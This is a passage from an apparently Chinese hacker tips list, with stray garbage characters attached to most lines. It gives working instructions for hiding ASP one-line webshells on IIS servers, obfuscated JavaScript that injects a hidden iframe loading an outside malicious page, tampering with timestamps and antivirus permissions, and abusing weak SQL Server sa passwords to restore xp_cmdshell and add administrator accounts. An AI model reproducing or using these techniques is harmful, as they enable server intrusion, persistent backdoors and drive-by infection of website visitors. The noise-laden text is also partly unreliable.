执行后可以用AT命令查看新加的任务) n& }- G3 p" Z& e# Q. p
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
- h# T: _: D# b7 X5 d9 W- m
* f L, v' L* l) z* j, D& t53、隐藏ASP后门的两种方法- `. D& H" t! b/ N
1、建立非标准目录:mkdir images..\5 v3 T% f/ o: d4 b( V
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
" a J4 w# v @% C* C) N$ V通过web访问ASP木马:http://ip/images../news.asp?action=login
* U5 X$ |* T6 n# s2 J如何删除非标准目录:rmdir images..\ /s
) ~0 x$ X3 B6 z: m2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:, @4 {0 V# e% U2 X3 }& {- S A; Z
mkdir programme.asp
6 X: C/ @+ Y$ U Z' l7 y) P新建1.txt文件内容:<!--#include file=”12.jpg”-->
% j5 x; D- U( f' G. P' h新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件 h, u+ |: `. B
attrib +H +S programme.asp
7 ^* { r4 L$ |: a, i* n* v+ x通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
# v4 q) J7 s$ K# }6 ?: M& Z
$ I% ^/ w! e- e) z7 a2 `54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
$ a4 g+ x+ J* x5 I$ N: {. J' [" B然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。: v2 u4 h. _) X. Y8 R
1 A& N, ^) c; k! M6 i; ?! [55、JS隐蔽挂马
F" p' O; t5 M7 |! F! ~) i/ c1.% n/ p7 I' I$ D j" G/ Z- h" r$ o
var tr4c3="<iframe src=ht";8 Z! C2 A& C8 r( I* ]
tr4c3 = tr4c3+"tp:/";
& \3 H9 a' x* N; D. S) {tr4c3 = tr4c3+"/ww";
- {) s7 R9 M9 ^4 E- d6 _tr4c3 = tr4c3+"w.tr4";
# T2 `* }, I% ]2 k/ _9 htr4c3 = tr4c3+"c3.com/inc/m";4 }7 E9 w, v5 g1 P7 y
tr4c3 = tr4c3+"m.htm style="display:none"></i";* C4 Q; B. r0 z* @+ j
tr4c3 =tr4c3+"frame>'";6 O- c- |9 [6 ~1 m5 [8 Q' J3 g8 q
document.write(tr4c3);- n) N1 O0 o1 y/ e. h- V
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。" O8 t& `; |" Z. X3 Q7 z
H6 ?. N. m. d' A$ x
2.9 ~' c3 U, c' i+ t- H0 d
转换进制,然后用EVAL执行。如
9 H2 I E. _2 Y+ ~eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");4 M: c0 R- a2 g$ X4 ?& o
不过这个有点显眼。
! U" s& k% j8 q, E, z! n6 E3./ ^* k( d9 H% T9 {) O
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
3 s- K% z L$ l9 }! P; r最后一点,别忘了把文件的时间也修改下。
$ \" ?; b- }' D
7 @) {1 T5 Y) O" y56.3389终端入侵常用DOS命令
( b5 U* I- u4 C# Z) _4 t! ]taskkill taskkill /PID 1248 /t
" V! i% }& ]: y: i; G- E, j1 q2 }, Z- ]9 A9 y! D, C/ J- K0 ~- Y% Z
tasklist 查进程 z$ U' N2 p1 }% W' C
: g9 G) k; J7 }* I7 J8 dcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
* t/ u7 ^: h/ t# c; p/ miisreset /reboot1 d. _8 L% Z+ t4 l- ?% N% v* F, {
tsshutdn /reboot /delay:1 重起服务器$ d0 E/ l% U$ Q. ] s' T
( B: G. } G6 ^' t1 ^3 J5 [4 ^# z
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
, d4 |3 R) j' @% m1 @% ~1 a, E: v9 C/ x* g7 w" ^; d# h$ M( P A
query user 查看当前终端用户在线情况
+ q8 c- b. a$ o4 |- D
: P/ b) v5 v) H1 I$ n+ U要显示有关所有会话使用的进程的信息,请键入:query process *# K. x& g2 ]" @
3 @% @ N6 z4 E6 z
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:29 l: l8 m n+ ~7 Y2 \
! [ \$ g* E! I7 M
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
7 P% O* k! u5 y" e0 p3 N5 k4 f$ u% h1 p0 N5 n4 a- F% L
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM027 u1 B. O( _* `9 u* m! c9 r
- e+ y) _8 [+ l" S6 @命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% a$ T9 Y( q9 B5 l- C
. q1 Q V' K4 E9 L- z: f命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统! F8 j. Z4 B- j- x. U3 V, p2 S
* ?& A6 P- v% S, }
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
8 n4 s& p7 @7 n& q4 M, a, E i/ w, F
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机/ s& m" a- d3 q: k( Q/ K) V6 T
9 B7 N+ C. m) |9 n
56、在地址栏或按Ctrl+O,输入:
" h: U% b; S1 X. ?javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
% \# G4 u0 D" V* e8 E0 L% }4 p) k0 Y' Z1 @
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# w1 b* G' q, e2 u1 u7 T( z$ R7 h! k" s& X0 U* z, h+ A# a0 F
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' w* M+ G9 F( G" Q用net localgroup administrators是可以看到管理组下,加了$的用户的。
7 E1 R1 o$ N& q/ l5 ^1 N. A
: y# a# @# s/ k3 J1 t( u1 \58、 sa弱口令相关命令# I( c1 S: Q6 p/ I6 c
3 {8 `& q' Y2 P: s# U
一.更改sa口令方法:
0 U! R6 N/ j* N3 s) M用sql综合利用工具连接后,执行命令:0 c+ x$ @8 w2 X: n& S! }5 M
exec sp_password NULL,'20001001','sa'
+ R! J/ p9 n' @, Y ~3 D(提示:慎用!)
2 b) ]/ c2 |' @4 Z* k! u5 c7 K9 U$ y8 O# t& Q- b ]
二.简单修补sa弱口令.
8 V$ w0 N# |' k, K+ g2 D8 ?0 j, H0 A8 T, D0 W
方法1:查询分离器连接后执行:9 G8 V. e2 F2 c# }0 c& [' b
if exists (select * from5 Y$ I# O& K$ |$ A, N& g
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
7 R; E9 z9 p/ O# `8 q0 ]% j4 v8 ]OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) j1 G% r0 V0 L2 {* X# g
9 s" \& N8 i" ?: vexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2 O: W% {0 j4 P! j* A5 N0 b! \& U0 O
GO
u( a/ p: q3 P
. ~: G/ ~& h9 K" t* A3 x* d然后按F5键命令执行完毕- {/ t* Y7 z U3 p
1 d2 b& Z2 W5 ]- m) f$ i% N
方法2:查询分离器连接后
9 V2 A# @) H: U4 T第一步执行:use master
5 F- ~$ k3 h6 h% Z* A' w8 j第二步执行:sp_dropextendedproc 'xp_cmdshell'4 V! [$ v! t$ h3 g% e9 t
然后按F5键命令执行完毕
, R1 c# \8 i/ A3 |1 f3 e) m0 g& N! e, E; i9 X( f% a3 O6 r
- h7 @, M+ v0 U3 m2 d4 N& A: D) g! u0 E
三.常见情况恢复执行xp_cmdshell.9 ^$ m7 S$ a; o4 e/ Q: a8 G6 D# n" o
+ Y! T+ M3 n1 |" z; F/ s
5 b& w w" c& }8 s1 未能找到存储过程'master..xpcmdshell'.1 _3 h# d4 U1 p
恢复方法:查询分离器连接后,
7 }& p# M. w) I5 f( |. ~$ L% J6 i第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int) D' C; c# a( j7 e
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 D* t8 h# @; E+ ~8 z# P% A
然后按F5键命令执行完毕. r# n9 o4 a0 f& S1 y" L$ ~: N2 [& L
7 S9 ?4 k9 Q/ W0 B( a+ x: W9 x
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。); n% g/ ]2 Z- l6 `7 E- m3 f ^- m1 y
恢复方法:查询分离器连接后,8 G9 t( K) M1 ^- n
第一步执行:sp_dropextendedproc "xp_cmdshell"8 E9 d/ k3 r4 A
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 z7 r0 [6 {- A; [9 n x
然后按F5键命令执行完毕% d1 ^0 z& J6 s( _/ Z/ N
1 D, r' H1 j6 F$ L
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
) e0 z6 Y7 N# j, G5 z恢复方法:查询分离器连接后,+ V/ P8 V8 g. Q5 [6 t( C
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'9 S. _9 G2 u) N7 G2 G$ T' @
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
- f3 l5 v& s$ b- [% Z4 H然后按F5键命令执行完毕 x j2 ^% o6 z3 ~$ l! y7 {5 F$ d$ g
+ z0 D7 C& V, d( C( @6 B2 h9 G6 E
四.终极方法.
) o& K0 j$ ]$ _6 o如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
/ Z6 \: R F6 P3 E9 h) N查询分离器连接后,+ U3 {+ o S/ Z \' C* ^, R
2000servser系统:
" F4 j2 s' y& f" C8 g: |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
0 E$ l: q) G8 d& T: V' f) R: c' N& o" O: ~0 m6 e/ o' T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 z1 J; n& g& o( Z; r
7 G4 h8 c% K5 F, m7 G9 ?$ `
xp或2003server系统:
0 U3 p8 M2 U1 U5 u
: J5 G- R; a5 l5 A$ {6 u' ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
( ^0 s' n; z! [) M& O+ [! y' X; M8 C: v2 m: c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ `6 Z7 X& m, n4 O# E& D+ [
|